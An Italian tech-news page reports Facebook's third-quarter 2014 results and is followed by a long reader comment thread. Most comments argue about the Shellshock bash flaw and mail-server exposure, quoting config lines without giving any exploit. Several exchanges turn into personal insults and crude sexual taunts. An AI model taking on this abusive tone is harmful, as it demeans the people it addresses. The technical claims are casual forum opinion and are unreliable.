Facebook tira avanti, i conti sono a posto

Ancora positiva la trimestrale del social network: crescono gli utenti e gli introiti. In attesa che gli acquisti Whatsapp ed Instagram diano i loro frutti

Roma – Facebook ha annunciato i risultati finanziari validi per il periodo conclusosi lo scorso 30 settembre: numeri che confermano il trend più che positivo del social network che continua a crescere e a superare le aspettative degli investitori .

Per il social network il terzo trimestre fiscale per il 2014 significa nel dettaglio un fatturato che raggiungere quota 3,2 miliardi di dollari (rispetto ai 2 dello stesso periodo del 2013 ed ai 3,12 previsti dagli analisti), un profitto netto di 806 milioni di dollari ovvero quasi il doppio rispetto a quanto segnato nel 2013, per un guadagno per azione di 0,43 dollari.

Certo, c’è qualche “ma” da considerare per Faceboook: il neo-acquisto WhatsApp – che ora si scopre essere costato 19 miliardi di dollari perché 15,3 rappresentano una compensazione per “la buona volontà” del suo team – ha perso circa 200 milioni negli ultimi due anni e non è previsto che possa garantire un attivo nel breve periodo.

Nonostante questo il fondatore e CEO Mark Zuckerberg il risultato ottenuto superando quota 1,35 miliardi di utenti attivi al mese (più di 860 milioni al giorno), e ringraziato tutta la squadra che ha permesso di raggiungere questo record.

Claudio Tamburrino

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • lalla63 scrive:
    PostaCertificat@ sta spammando
    Sta arrivando spam (malevolo ??) da PostaCertificat@, quello di Governo Italiano per dialogare con Enti Pubblici, e gestito da Poste Italiane. Ci sarà dietro Shellshock ???
  • Alvaro Vitali scrive:
    Ancora con il condizionale ...
    <I
    La crisi Shellshock si fa sempre più seria </I
    Ah si? <I
    A un mese dalla scoperta del bug noto come Shellshock, i rischi di questa nuova vulnerabilità "sistemica" si allargano, invece di diminuire </I
    Ma dove? <I
    Un malintenzionato potrebbe inviare una email con un header "infetto" </I
    Potrebbe? <I
    Uno dei problemi più spinosi posti dalla scoperta di Shellshock è il fatto che il baco coinvolga anche sistemi molto vecchi o non aggiornati </I
    E grazie al ....Insomma, si cerca di spremere la notizia come un limone, ma se il limone è già stato abbondantemente spremuto ...
    • koboldo scrive:
      Re: Ancora con il condizionale ...
      FUD al fine di compensare le figuracce rimediate dagli altri... si quei due lì (apple)(win).
    • un utente scrive:
      Re: Ancora con il condizionale ...
      - Scritto da: Alvaro Vitali
      <I
      La crisi Shellshock si fa sempre più
      seria </I



      Ah si?Eh sì... Serissima!!! "Decinaie" e "dicinaie" di sistemi in ginocchio soprattutto in quel di Neverlands

      <I
      A un mese dalla scoperta del bug noto
      come Shellshock, i rischi di questa nuova
      vulnerabilità "sistemica" si allargano, invece di
      diminuire </I



      Ma dove?Neverlands. Detto sopra.
      <I
      Un malintenzionato potrebbe inviare
      una email con un header "infetto" </I



      Potrebbe?Dipende.Se il malintenzionato è di cattivo umore, se ha dormito male, se si sente dispettoso...
      <I
      Uno dei problemi più spinosi posti
      dalla scoperta di Shellshock è il fatto che il
      baco coinvolga anche sistemi molto vecchi o non
      aggiornati </I



      E grazie al ....Ma tu pensa... Un baco che coinvolge sistemi molto vecchi o non aggiornati.Una notiziona!(rotfl)(rotfl)(rotfl)Voto all'articolo: appena un gradino sopra quello di Libero (http://is.gd/upjV7s) :D
      • due utenti scrive:
        Re: Ancora con il condizionale ...
        Scherzi? La differenza è che su libero sono ben pagati, mentre qui fanno la fame.
        • maxsix scrive:
          Re: Ancora con il condizionale ...
          - Scritto da: due utenti
          Scherzi? La differenza è che su libero sono ben
          pagati, mentre qui fanno la
          fame.E qui il cantinaro M5S esce con tutto il suo livore.Ma dimmi invece di star qua a dare dei morti di fame a chi cerca di tirare avanti la propria carretta perché non vai a piantare qualche gazebo in giro con un cartello e un megafono?Una campagna conto la disinformazione su shellshock.Io ti propongo una coabitazione del parcheggio con Gigi.Non so se è contento, alla mal parata, ovviamente negherò tutto.Gigi con i cestelli della friggitrice ha dimostrato di essere un tipo parecchio pericoloso.
          • bubba scrive:
            Re: Ancora con il condizionale ...
            - Scritto da: maxsix
            Gigi con i cestelli della friggitrice ha
            dimostrato di essere un tipo parecchio
            pericoloso.scambiatevi di posto... tu friggi e lui sta' al Genius Bar...
          • maxsix scrive:
            Re: Ancora con il condizionale ...
            - Scritto da: bubba
            - Scritto da: maxsix


            Gigi con i cestelli della friggitrice ha

            dimostrato di essere un tipo parecchio

            pericoloso.
            scambiatevi di posto... tu friggi e lui sta' al
            Genius
            Bar...Ucciderebbe qualcuno piuttosto che abbandonare la sua baracca delle salamelle che tante soddisfazioni gli da.Imprenditori vecchio stampo, tanto di cappello.
          • caron scrive:
            Re: Ancora con il condizionale ...
            scommetto che sei un piddino oltre che un cliente apple, ce le hai tutte eh.. non ti lamentare che la gente ti disprezza, ma non dire in giro che sei renziano altrimenti ti affogano di sputi
  • koboldo scrive:
    Re: shellshock
    Veramente il Legu è della vostra stessa (poco) simpatica combriccola closed vs resto del mondo.Che succede? Non vi riconoscete più?Te lo spiego io cosa sta succedendo: da quando ios è diventato android-like e windows si accinge alla linarizzazione con la combo oneget + powershell non ci state capendo più niente.
  • archimandrito scrive:
    Re: Ma le patch?
    - Scritto da: maxsix
    Ma lol, guarda coso ancient, ti hanno già
    sbugiardato.
    Dai collione fai il bravo.Amico caro.... "ti hanno chi?"Tu no perchè non sai leggere.l'articolo neppure (perchè c'è scritto esattamente quello che ho riportato) quindi a chi ti riferisci?Qui uno di quelli che non ha nulla da ridere sei tu!Ripeto:lrwxrwxrwx 1 root root 4 2013-04-08 14:47 /bin/sh -
    bash (e questo è su un Mac) vedi te.....Hai patchato?(rotfl)(rotfl)
    • Alvaro Vitali scrive:
      Re: Ma le patch?
      Tra l'altro, non si riesce a capire cosa abbia da ironizzare maxsix visto che si sta parlando di una falla risalente ai tempi di UNIX e quindi presente anche su MacOSX.Apple se ne è uscita con le solite ultime parole famose: "I nostri SO sono al sicuro"; dopo una settimana hanno rilasciato una patch che non si sa neppure se funzioni (tanto gli apple-fan si bevono qualsiasi panzana).
      • archimandrito scrive:
        Re: Ma le patch?
        No si sa già <b
        che non funziona! </b
        (è diverso)......"Apple's Shellshock patch for Macs is incomplete"http://www.cnet.com/news/apples-shellshock-patch-incomplete-say-experts/
  • shoccuccia scrive:
    olio di ricino
    Sta XXXXXXX da niubbi (shellnoob) le tirate fuori tutte le volte che apple e microsoft vengono sXXXXXte su PI, siete dei clown prezzolati (win)(apple).
  • archimandrito scrive:
    Re: ma nvedi sto
    Più che altro a differenza di te so leggere.Certo capire la differenza che c'è tra scrivere "/bin/bash" e "/bin/sh" per uno che usa il Mac è complicato...dato che la situazione sul Mac si presenta così:lrwxrwxrwx 1 root root 4 2006-04-08 14:47 /bin/sh -
    bashDa:http://apple.stackexchange.com/questions/143208/how-to-restore-a-removed-bin-sh-file"The quick and fix:sudo ln -sf bash /bin/shas it will create a symlink pointing from /bin/sh to /bin/bash just like every other UNIX and Linux distribution. "Certo che (ripeti) bisognerebbe sapere leggere....
    • maxsix scrive:
      Re: ma nvedi sto
      - Scritto da: archimandrito
      Più che altro a differenza di te so leggere.
      Certo capire la differenza che c'è tra scrivere
      "/bin/bash" e "/bin/sh" per uno che usa il Mac è
      complicato...
      dato che la situazione sul Mac si presenta così:
      lrwxrwxrwx 1 root root 4 2006-04-08 14:47
      /bin/sh -

      bash

      Da:

      http://apple.stackexchange.com/questions/143208/ho

      "The quick and fix:

      sudo ln -sf bash /bin/sh
      as it will create a symlink pointing from /bin/sh
      to /bin/bash just like every other UNIX and Linux
      distribution.
      "

      Certo che (ripeti) bisognerebbe sapere leggere....Ora dimmi, per quale motivo stai saltando intorno alla questione Mac?No dimmelo.Ti avverto, eh.Stai per prendere una delle solite sberlone a cui il tuo predeXXXXXre era tanto affezionato.Pensaci bene eh, torno tra 2 orette a vedere.
      • Winner scrive:
        Re: ma nvedi sto
        Perchè dire: "apple schifezza" = vittoria totale in tutti i dibattiti (win).
        • maxsix scrive:
          Re: ma nvedi sto
          - Scritto da: Winner
          Perchè dire: "apple schifezza" = vittoria totale
          in tutti i dibattiti
          (win).Ah ecco.Me pareva.Ma dico, allora si sta parlando di shellbug di mailer demon, di server non aggiornati e bla bla bla e ti salta fuori sto sgherro che alza il dito urlando e ma "il mac, e ma la patch, e ma ...".Uno di primo acchito dice, boh questo ha avuto un incontro ravvicinato con un ragade e soffre proviamo a lasciarlo perdere.Poi il suddetto continua a inseguirti sempre con il dito alzato farfugliando sempre le stesse cose.Allora uno dice, ma allora questo è proprio rinXXXXXXXXto nell'animo.Ed eccoci qua con "archimandrito" il collione 2.0.Bellissimo.
          • Winner scrive:
            Re: ma nvedi sto
            Credo sia proprio un collione chi copia i nick degli altri. O uno XXXXXXXlo
          • archimandrito scrive:
            Re: ma nvedi sto
            infatti Ne il mailer daemon ne bash sono coinvolti.Basta leggere l'aritcolo su zdnet.Il problema è sempre leggere (e essere capaci di farlo).Francamente a me che tu sia capace di farlo frega zero.
          • maxsix scrive:
            Re: ma nvedi sto
            - Scritto da: archimandrito
            infatti Ne il mailer daemon ne bash sono
            coinvolti.
            Basta leggere l'aritcolo su zdnet.
            Il problema è sempre leggere (e essere capaci di
            farlo).
            Francamente a me che tu sia capace di farlo frega
            zero.E allora ce lo fai un santo piacere?Ti levi un attimo dai cosidetti.Sai da tanto ti agiti muovi troppa aria e fai corrente.E non ho voglia di avere torcicolli.
      • archimandrito scrive:
        Re: ma nvedi sto
        - Scritto da: maxsix
        Ora dimmi, per quale motivo stai saltando intorno
        alla questione
        Mac?
        No dimmelo.Facile il Mac usa bash!

        Ti avverto, eh.uhuuhhhChe paura!(rotfl)(rotfl)
      • caron scrive:
        Re: ma nvedi sto
        povero applefag, mac ha bash, e prenditi sta trave
  • Gianni scrive:
    shellshock
    Leggo sotto di gente che non crede che si possa bucare un server via mail...Faccio presente che su vecchissimi server che usano, solo per esempio, sendmail nella configurazio puo essere presente una cosa del genere (da sendemail.cf):Mprog, P=/bin/sh, F=lsDFMoqeu9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, D=$z:/, T=X-Unix/X-Unix/X-Unix, A=sh -c $u...che si potrebbe attivare in presenza di un qualche filtro presente, magare nel file alias per gestire, che so una mailing list, tipo majordomo od altro.Gira depotenziata, non root, e non ho fatto reali verifiche su come vengono gestiti gli argomenti passati ma tecnicamente... fa da pensare.
    • archimandrito scrive:
      Re: shellshock
      Da da pensare ma da da pensare (eventualmente) a prescindere da Bash!Se uno configura in modo da richiamare una shell ha un problema a prescindere da quale shell chiama!E poi (ripeto) il problema non è SMTP bensì l'agent di "delivery" e sopratutto cosa fa L'agent di delivery (parsing oppure no e di quali headers e con quali filtri?) Onestamente mi pare che (ammesso che ci sia il problema "niubbo") la questione si porrebbe qualunque sia la shell verso cui "esci" in modo non controllato (che sia bash o altro non mi pare cambi granchè la sostanza).
      • archimandrito scrive:
        Re: shellshock
        Forse non ti è chiaro!Nel caso di specie è irrilevante che sia o non sia bash!Il problema è che possa in uno script qualunque richiamre la shell (quale che essa sia) senza fare parsing degli argomenti..Se lo fai ci sono decine di exploit che funzionano (bash o non bash).Mi pare abbastanza semplice!
      • archimandrito scrive:
        Re: shellshock
        - Scritto da: Gianni
        Il sistema ha 17 anni ed il kenel è stato
        ricompilato da "poco".
        :)P.S.Il kernel?E cosa c'entra il kernel con Bash?1) Il kernel se ne strafotte di quale shell tu usi e anche che sia o non sia patchata!Bash è un "programma" (aka applicazione)... 2) il sistema può anche averne cento di anni resta il fatto che se tu passi alla shell argomenti senza controllo sei a rischio qualsiasi shell tu usi!
        • Gianni scrive:
          Re: shellshock
          Era solo per dire che il sistema è molto più vecchio di quello che risulta dalla data di compilazione del kernel.. e solo per dire che le shell erano utilizzate eccome. Quella è una configurazione generata dai template originali del sendmail, non è che qualche sysadmin ci ha messo dentro del suo.
          • archimandrito scrive:
            Re: shellshock
            era solo per dire (e ribadire) che bash non c'entra nulla!Era solo per ribadire che <b
            SE </b
            quel sistema è a rischio (posto che lo sia dato che da quello che hai postato potrebbe esserlo oppure no!) lo è da lungo tempo e per colpa di chi lo ha configurato.Dipende tutto <b
            non </b
            dalla configurazione che hai postato ne dalla "età" del sistema ma da ciò che viene eventualmente eseguito (parametro passato alla shell) il "bug" <b
            se c'è </b
            sta li!E quello che hai postato non ne da affatto conto!
          • maxsix scrive:
            Re: shellshock
            - Scritto da: archimandrito
            era solo per dire (e ribadire) che bash non
            c'entra
            nulla!
            Era solo per ribadire che <b
            SE
            </b
            quel sistema è a rischio (posto che
            lo sia dato che da quello che hai postato
            potrebbe esserlo oppure no!) lo è da lungo tempo
            e per colpa di chi lo ha
            configurato.
            Dipende tutto <b
            non </b
            dalla
            configurazione che hai postato ne dalla "età" del
            sistema ma da ciò che viene eventualmente
            eseguito (parametro passato alla shell) il "bug"
            <b
            se c'è </b
            sta
            li!
            E quello che hai postato non ne da affatto conto!Ma dico eh, invece di venire qua a sfracellarci i maroni con "di che colore è il cavallo bianco di napoleone" dico eh.Non è che puoi scrivere direttamene alla fonte del buon Alfonso?Così oltre a trovare un altro che ti sbugiarda clamorosamente, visto che non ti è bastata quella che hai preso qui, magari ti becchi una lezioncina su come queste cose funzionano.Orco, ma ti risponde in inglese....E tu l'inglese non lo sai.....Uffa, cambiano i nomi ma i problemi sono sempre gli stessi.
          • archimandrito scrive:
            Re: shellshock
            - Scritto da: maxsix
            Ma dico eh, invece di venire qua a sfracellarci i
            maroni con "di che colore è il cavallo bianco di
            napoleone" dico
            eh.Vedi il problema è che non è neppure un cavallo!L'unico che sta discutendo del colore sei tu...Perchè non hai ancora capito che ....A dirla tutta è un asino....E si che è pure scritto chiaramente!
          • maxsix scrive:
            Re: shellshock
            - Scritto da: archimandrito
            - Scritto da: maxsix


            Ma dico eh, invece di venire qua a
            sfracellarci
            i

            maroni con "di che colore è il cavallo
            bianco
            di

            napoleone" dico

            eh.
            Vedi il problema è che non è neppure un cavallo!
            L'unico che sta discutendo del colore sei tu...
            Perchè non hai ancora capito che ....
            A dirla tutta è un asino....
            E si che è pure scritto chiaramente!Ti prendo qui, che non ho voglia di leggere tutte le XXXXXXXte che hai scritto.Allora.Loro la, la fonte del buon Alfonso, ti dice che nei server "ancient" (che vuol dire antichi) che ancora ci sono in giro questo exploit potrebbe funzionare.I motivi sono chiarissimi a tutti tranne che a te, ovvero che a suo tempo era una cosa normale e ampiamente utilizzata quella di far passare dati tramite le shell e bash in particolare.Giusto o sbagliato che sia.E il buon Gianni ti ha ricordato che quella configurazione che ha citato era un template di SERIE fornito con sendmail.Quindi è molto ma molto facile che quel template stia girando, per esempio.Tutto il resto che ti sei contorto a dire del Mac (cosa centra poi...), del fatto che è sbagliato a prescindere (che ricordiamoci eh, prima dell'arrivo di shellshock te ne presentavo 10000 di sysadmin che usano bash per fare di tutto e di più e oggi negano tutto),NON CENTRA NIENTE CON QUESTO DISCORSO.Ti è CHIARO oppure NO, ora?
          • BelloCiccio scrive:
            Re: shellshock
            - Scritto da: maxsix
            - Scritto da: archimandrito

            - Scritto da: maxsix
            Loro la, la fonte del buon Alfonso, ti dice che
            nei server "ancient" (che vuol dire antichi) che
            ancora ci sono in giro questo exploit potrebbe
            funzionare.Che era poi quella fonte che sosteneva che su un asteroide la pressione faceva si che un rover stesse attaccato al suolo ... :|
          • caron scrive:
            Re: shellshock
            sembri un testimone di geova
          • archimandrito scrive:
            Re: shellshock
            - Scritto da: maxsixGuarda non so perchè insisti ma....
            Quindi è molto ma molto facile che quel template
            stia girando, per
            esempio.Ti dirò di più quel template sta persino (udite udite) in uno dei miei server ma.... peccato non è vulnerabile. :DQuello che continua a non esserti palese (cosa invece che han tutti capito) è che non è quel template a renderti vulnerabile (SE e sottolineo SE lo sei) forse ti sfugge che dipende dal programma o script che quel template chiama (ad esempio "procmail") e dal fatto che eventualmente il sudetto passi direttamente il controllo a una shell (ad esempio quella di un utente dato che lui (sendmail) non ha una shell) senza "parsare" nulla degli argomenti.Il che (scusa se te lo faccio ri-notare) è una cosa che fatta come amministratore di sistema è da interdizione perpetua dalla tastiera. Non a caso nel tuo esempio con qmail ti ho parlato di direttive messe nel file .qmail dell'utente.Ma essendo tu alquanto ignorantello non hai capito.
            Ti è CHIARO oppure NO, ora?Sarebbe auspicabile che ti fosse chiaro!Vuoi un disegnino? chiamiamo gigi che te lo "ceselli" su una salamella?
          • Leguleio scrive:
            Re: shellshock


            Ti è CHIARO oppure NO, ora?
            Sarebbe auspicabile che ti fosse chiaro!
            Vuoi un disegnino? chiamiamo gigi che te lo
            "ceselli" su una
            salamella?Non era Giggi, con due G?!? (newbie)
          • maxsix scrive:
            Re: shellshock
            - Scritto da: archimandrito
            - Scritto da: maxsix

            Guarda non so perchè insisti ma....


            Quindi è molto ma molto facile che quel
            template

            stia girando, per

            esempio.

            Ti dirò di più quel template sta persino (udite
            udite) in uno dei miei server ma.... peccato non
            è
            vulnerabile.
            :DPassami gli IP che vediamo.
            Quello che continua a non esserti palese (cosa
            invece che han tutti capito) è che non è quel
            template a renderti vulnerabile (SE e sottolineo
            SE lo sei) forse ti sfugge che dipende dal
            programma o script che quel template chiama (ad
            esempio "procmail") e dal fatto che eventualmente
            il sudetto passi direttamente il controllo a una
            shell (ad esempio quella di un utente dato che
            lui (sendmail) non ha una shell) senza "parsare"
            nulla degli
            argomenti.
            Ascolta coso.Te lo dico per l'ultima volta poi non ci torno più sopra.Le installazioni tanta, ma tanta gente, la fa come gli pare.E agli anni, probabilmente quando tu giocavi ancora con i Duplo, queste cose succedevano regolarmente e nessuno, NESSUNO, si poneva il problema.Punto, fine stop.Ora nel 2014 si scopre che quello che si faceva nel 2004 non andava bene.Ottimo, ma fine del discorso.
            Il che (scusa se te lo faccio ri-notare) è una
            cosa che fatta come amministratore di sistema è
            da interdizione perpetua dalla tastiera.
            Posso anche concordare, ma tant'è.Dobbiamo ancora disquisire in merito?
            Non a caso nel tuo esempio con qmail ti ho
            parlato di direttive messe nel file .qmail
            dell'utente.Sinceramente non ti ho nemmeno badato più di tanto.
            Ma essendo tu alquanto ignorantello non hai
            capito.
            Semplicemente non mi va di disquisire su direttive e non direttive.Ho solo detto che a memoria le classiche installazioni "preconfezionate" (chiamiamole così) di Debian + qmail + spamassasin dell'epoca passavano i filtri antispam tramite il terminale.Punto. Stop.

            Ti è CHIARO oppure NO, ora?
            Sarebbe auspicabile che ti fosse chiaro!
            Vuoi un disegnino? chiamiamo gigi che te lo
            "ceselli" su una
            salamella?Gigi ti aspetta.Ci sono le piastre da sgrassare.Olio di gomito giovane.
          • tucumcari scrive:
            Re: shellshock

            Sarebbe auspicabile che ti fosse chiaro!
            Vuoi un disegnino? chiamiamo gigi che te lo
            "ceselli" su una
            salamella?Se ti riferisci ar trojone, quello è Giggi. ;)
          • Paolo scrive:
            Re: shellshock
            - Scritto da: maxsix
            - Scritto da: archimandrito
            Ma dico eh, invece di venire qua a sfracellarci i
            maroni con "di che colore è il cavallo bianco di
            napoleone" dico eh.Sembra il leguleo eh ?
          • bubba scrive:
            Re: shellshock
            - Scritto da: Gianni
            Era solo per dire che il sistema è molto più
            vecchio di quello che risulta dalla data di
            compilazione del kernel.. e solo per dire che le
            shell erano utilizzate eccome. Quella è una
            configurazione generata dai template originali
            del sendmail, non è che qualche sysadmin ci ha
            messo dentro del
            suo.si, forse... ma non so se ti sei accorto che l'uso di /bin/sh LI', e' deprecato dal 1993 (o forse prima)! Andavi ancora all'asilo ed era gia' sconsigliato... tant'e' che c'era smrsh o qualcosa del genere apposta...
          • Gianni scrive:
            Re: shellshock
            Lo so che nei template potevi optare di utilizzare la restricted shell invece della shell normale.Ma il punto non è stabilire se quella povera macchina avesse dei problemi di sicurezza (non ne aveva, per l'utilizzo che se ne faceva, con la configurazione che aveva).Il punto era solo provare che di macchine con problemi al sistema di posta, in giro potrebbero essercene. Da qui questi tentativi di exploit che non sono totalmente campati in aria.
          • bubba scrive:
            Re: shellshock
            - Scritto da: Gianni
            Lo so che nei template potevi optare di
            utilizzare la restricted shell invece della shell
            normale.
            Ma il punto non è stabilire se quella povera
            macchina avesse dei problemi di sicurezza (non ne
            aveva, per l'utilizzo che se ne faceva, con la
            configurazione che
            aveva).
            Il punto era solo provare che di macchine con
            problemi al sistema di posta, in giro potrebbero
            essercene. Da qui questi tentativi di exploit che
            non sono totalmente campati in
            aria.ed e' stato detto il contrario? io al max biasimavo chi urlava allo scandalo... PER ORA c'e' UN log che, per come era presentato dall'articolo, faceva pensare ad una violazione via parsing header mail (ma in effetti non era evidente neppure quello... la macchina era si violata ma ad essere pignoli non si capiva se quello fosse un tentativo di spambash o il metodo usato per violare il sistema medesimo). QUANDO (e se) arrivera' roba seria, se ne riparlera'.Cmq mi ha fatto nostalgia vedere "i bei vecchi attacchi di una volta" :)
          • Link Sys scrive:
            Re: shellshock
            lrwxrwxrwx 1 root root 4 2006-04-08 14:47 /bin/sh -
            basharchimandrito ha detto tutto correttamente:- la prima linea di questo messaggio ha tutte le info immediatamente disponibili (a chi le sa leggere)- l'articolo di c net linkato é chiarissimo (a chi lo sa leggere)- il problema dell'header mail é un problema solo se riesce a lanciare la shell (indipendentemente dalla shell che va a lanciare)@maxsix: difendere Apple o ribadire che apple non é *nix é solo un arrampicarsi sugli specchi. Microsoft ce ne ha messo del tempo, ma alla fine Win7 é un buon prodotto, migliorato in termini di prestazioni con Win8 (purtroppo "peggiorandone" l'interfaccia). OSX era uno dei sistemi piú stabili (poi peró se vai a vedere i log... ti accorgi che le apps si inceppano eccome... solo lo fanno in modo molto "trasparente" per l'utente). Su Linux si basa internet e quasi tutta la ricerca.
  • maxsix scrive:
    Reda, daje su
    Insomma c'è tanta roba oggi da scrivere.Dal mega buco samsung/android al samsung S6 che salta il periodo di natale lasciando aperti i portoni a Apple.Su datevi da fare che qua i cantinari spingono.
    • stronzone scrive:
      Re: Reda, daje su
      - Scritto da: maxsix
      Su datevi da fare che qua i cantinari spingono.t'o spingono, ma forte ehhhhhh (rotfl)
  • stronzone scrive:
    ma sto mec è na tracetia
    http://cxsecurity.com/issue/WLB-2014100174pieno de buchi, nun se arripija più (rotfl)
  • stronzone scrive:
    ma nvedi sto
    ma che cagatone 'sto eppolpai http://www.zerohedge.com/news/2014-10-28/angry-tim-cook-issues-veiled-threat-retailers-shunning-apple-payfloppete floppete floppete (rotfl)
    • maxsix scrive:
      Re: ma nvedi sto
      - Scritto da: XXXXXXXne
      ma che cagatone 'sto eppolpai
      http://www.zerohedge.com/news/2014-10-28/angry-tim
      A coso, c'è l'articolo apposta.Vai li c'è una scatola di schiaffoni pronta.Quando entri bussa, chiedi permesso, e vedi se c'è Bertuccia o il sottoscritto.
      • stronzone scrive:
        Re: ma nvedi sto
        - Scritto da: maxsix
        A coso, c'è l'articolo apposta.
        Vai li c'è una scatola di schiaffoni pronta.te dò ncarcio nXXXX che te faccio diventà XXXXXo
        • Un altro scrive:
          Re: ma nvedi sto
          - Scritto da: XXXXXXXne
          - Scritto da: maxsix


          A coso, c'è l'articolo apposta.

          Vai li c'è una scatola di schiaffoni pronta.

          te dò ncarcio nXXXX che te faccio diventà XXXXXoLo è gia, come tutti gli applefan...[img]http://images.appshopper.com/screenshots/321/414510.jpg[/img]
          • maxsix scrive:
            Re: ma nvedi sto
            - Scritto da: Un altro
            - Scritto da: XXXXXXXne

            - Scritto da: maxsix




            A coso, c'è l'articolo apposta.


            Vai li c'è una scatola di schiaffoni
            pronta.



            te dò ncarcio nXXXX che te faccio diventà
            XXXXXo

            Lo è gia, come tutti gli applefan...

            [img]http://images.appshopper.com/screenshots/321/Già.La tua morosa/moglie è qui con me.Sta annuendo divertita.Vuoi i particolari?
          • Un altro scrive:
            Re: ma nvedi sto
            - Scritto da: maxsix
            - Scritto da: Un altro

            - Scritto da: XXXXXXXne


            - Scritto da: maxsix






            A coso, c'è l'articolo apposta.



            Vai li c'è una scatola di
            schiaffoni

            pronta.





            te dò ncarcio nXXXX che te faccio
            diventà

            XXXXXo



            Lo è gia, come tutti gli applefan...




            [img]http://images.appshopper.com/screenshots/321/

            Già.

            La tua morosa/moglie è qui con me.
            Sta annuendo divertita.

            Vuoi i particolari?Si, visto che si chiama Ugo, spero ti stia sfondando come fosse un martello pneumatico con l'enorme michia che conosco tanto bene.Ti consiglio di leccargli l'ano lo fa impazzire.
          • maxsix scrive:
            Re: ma nvedi sto
            - Scritto da: Un altro
            - Scritto da: maxsix

            - Scritto da: Un altro


            - Scritto da: XXXXXXXne



            - Scritto da: maxsix








            A coso, c'è l'articolo
            apposta.




            Vai li c'è una scatola di

            schiaffoni


            pronta.







            te dò ncarcio nXXXX che te faccio

            diventà


            XXXXXo





            Lo è gia, come tutti gli applefan...








            [img]http://images.appshopper.com/screenshots/321/



            Già.



            La tua morosa/moglie è qui con me.

            Sta annuendo divertita.



            Vuoi i particolari?

            Si, visto che si chiama Ugo, spero ti stia
            sfondando come fosse un martello pneumatico con
            l'enorme michia che conosco tanto
            bene.
            Ti consiglio di leccargli l'ano lo fa impazzire.Ah quindi sei un cantinaro XXXXXXXXX.Sta XXXXXXX allora da dove viene?Boh, a sto punto è ininfluente, insomma.
          • Un altro scrive:
            Re: ma nvedi sto
            - Scritto da: maxsix
            - Scritto da: Un altro

            - Scritto da: maxsix


            - Scritto da: Un altro



            - Scritto da: XXXXXXXne




            - Scritto da: maxsix










            A coso, c'è l'articolo

            apposta.





            Vai li c'è una scatola di


            schiaffoni



            pronta.









            te dò ncarcio nXXXX che te
            faccio


            diventà



            XXXXXo







            Lo è gia, come tutti gli
            applefan...













            [img]http://images.appshopper.com/screenshots/321/





            Già.





            La tua morosa/moglie è qui con me.


            Sta annuendo divertita.





            Vuoi i particolari?



            Si, visto che si chiama Ugo, spero ti stia

            sfondando come fosse un martello pneumatico
            con

            l'enorme michia che conosco tanto

            bene.

            Ti consiglio di leccargli l'ano lo fa
            impazzire.

            Ah quindi sei un cantinaro XXXXXXXXX.
            Sta XXXXXXX allora da dove viene?Se non lo sai tu che la devi pagare guarda...
            Boh, a sto punto è ininfluente, insomma.Ma si tanto chi scrive su pi è una massa di XXXXX.
          • maxsix scrive:
            Re: ma nvedi sto
            - Scritto da: Un altro
            - Scritto da: maxsix

            - Scritto da: Un altro


            - Scritto da: maxsix



            - Scritto da: Un altro




            - Scritto da: XXXXXXXne





            - Scritto da: maxsix












            A coso, c'è
            l'articolo


            apposta.






            Vai li c'è una
            scatola
            di



            schiaffoni




            pronta.











            te dò ncarcio nXXXX che
            te

            faccio



            diventà




            XXXXXo









            Lo è gia, come tutti gli

            applefan...



















            [img]http://images.appshopper.com/screenshots/321/







            Già.







            La tua morosa/moglie è qui con me.



            Sta annuendo divertita.







            Vuoi i particolari?





            Si, visto che si chiama Ugo, spero ti
            stia


            sfondando come fosse un martello
            pneumatico

            con


            l'enorme michia che conosco tanto


            bene.


            Ti consiglio di leccargli l'ano lo fa

            impazzire.



            Ah quindi sei un cantinaro XXXXXXXXX.

            Sta XXXXXXX allora da dove viene?

            Se non lo sai tu che la devi pagare guarda...
            E chi ti dice che si fa pagare.Tu lo dici.

            Boh, a sto punto è ininfluente, insomma.

            Ma si tanto chi scrive su pi è una massa di XXXXX.Considerando che chi ha tirato fuori l'argomento sei tu e ci hai presentato il tuo amico Ugo, siamo sicuri di una cosa.Che il XXXXXo qui dentro sei tu.Sicuro al 100%.Se te piace così [cit.]
          • Un altro scrive:
            Re: ma nvedi sto
            - Scritto da: maxsix


            Sta XXXXXXX allora da dove viene?

            Se non lo sai tu che la devi pagare guarda...
            E chi ti dice che si fa pagare.
            Tu lo dici.Tu: se hai scritto " XXXXXXX " !!E' un mestiere onesto e come tale va retribuito !Oppure sei come quegli scariconi che "rubano" i film dalle videoteche passando dall'internet ? Guarda che lo dico ad Allibito eh !!!Ocio !

            Ma si tanto chi scrive su pi è una massa di
            XXXXX.
            Considerando che chi ha tirato fuori l'argomento
            sei tu e ci hai presentato il tuo amico Ugo,
            siamo sicuri di una cosa.
            Che il XXXXXo qui dentro sei tu.
            Sicuro al 100%.Beh, come tutti qua dentro appunto !E che avevo detto !!
        • maxsix scrive:
          Re: ma nvedi sto
          - Scritto da: XXXXXXXne
          - Scritto da: maxsix


          A coso, c'è l'articolo apposta.

          Vai li c'è una scatola di schiaffoni pronta.

          te dò ncarcio nXXXX che te faccio diventà XXXXXoTu dici.Sarà.Anche no.
      • archimandrito scrive:
        Re: ma nvedi sto
        Più che il permesso bisognerebbe che bertuccia e tu sapeste cosa dite :postfix:x:AA:BB:Postfix Daemon:/var/spool/postfix:/bin/falseMa ovviamente è puramente utopico.
        • maxsix scrive:
          Re: ma nvedi sto
          - Scritto da: archimandrito
          Più che il permesso bisognerebbe che bertuccia e
          tu sapeste cosa dite
          :
          postfix:x:AA:BB:Postfix
          Daemon:/var/spool/postfix:/bin/false
          Ma ovviamente è puramente utopico.Parla con lui.http://www.zdnet.com/shellshock-attacks-mail-servers-7000035094/Leggi il veicolo d'attacco.http://pastebin.com/rbezRTPVRipeti con me:The bug had been in the Bash shell for 20 years and was widely deployed in a configuration that made it easy to exploit.Many of those vulnerable configurations are on forgotten systems, long considered stable and which may be difficult to patch.Ora traduci qui sotto:........................PS: Collione non è che ti fai un nick nuovo e registrato non ti sgamiamo in 1x2 eh.PS2: Senza di noi non puoi starePS3: Gigi è XXXXXXXtissimo con te. Sappilo.
          • stronzone scrive:
            Re: ma nvedi sto
            - Scritto da: maxsix
            Parla con lui.e te palla co questo http://cxsecurity.com/issue/WLB-2014100174bwahahahahaha (rotfl)
          • archimandrito scrive:
            Re: ma nvedi sto
